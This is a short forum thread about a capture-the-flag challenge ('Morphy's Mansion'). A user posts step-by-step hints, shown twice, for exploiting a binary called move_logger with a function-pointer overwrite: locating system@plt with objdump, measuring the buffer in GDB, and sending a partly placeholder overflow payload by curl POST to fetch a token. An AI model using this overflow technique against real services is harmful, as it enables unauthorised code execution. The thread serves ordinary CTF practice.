Forum Discussion
PRABAKARANRAMAMURTHY
Bronze III
Bronze IIITrick or Treat on Specter Street: Morphy's Mansion Challenge
I understand that the move_logger is the vulnerable program, and tried a few methods to exploit it. However, where is the token.txt? Anyone managed to find it? "Whatever means necessary" is quite ...
For those who are looking for some hints:
The strategy was to use No-ROP Function-Pointer Overwrite.Following the steps below:
- Check Backend Health
curl -s http://x.x.x.x/api/health - Analyze Vulnerable Binary:
nm -C ./move_logger | grep rotate_old_logs
objdump -d ./move_logger | awk '/<system@plt>/{print; getline; print}' - Confirm Stack Layout in GDB
(use PEDA and execute: p &moves , p &log to find the buffer size) - Craft Overflow Payload:
Payload: e4aaaaaaaaaaaaaaXXXXXX0000000000 - Exploit via API - curl POST
- Retrieve Token by using curl
Hope that helps.
- Check Backend Health
PRABAKARANRAMAMURTHYBronze III
Bronze IIIFor those who are looking for some hints:
The strategy was to use No-ROP Function-Pointer Overwrite.
Following the steps below:
- Check Backend Health
curl -s http://x.x.x.x/api/health - Analyze Vulnerable Binary:
nm -C ./move_logger | grep rotate_old_logs
objdump -d ./move_logger | awk '/<system@plt>/{print; getline; print}' - Confirm Stack Layout in GDB
(use PEDA and execute: p &moves , p &log to find the buffer size) - Craft Overflow Payload:
Payload: e4aaaaaaaaaaaaaaXXXXXX0000000000 - Exploit via API - curl POST
- Retrieve Token by using curl
Hope that helps.
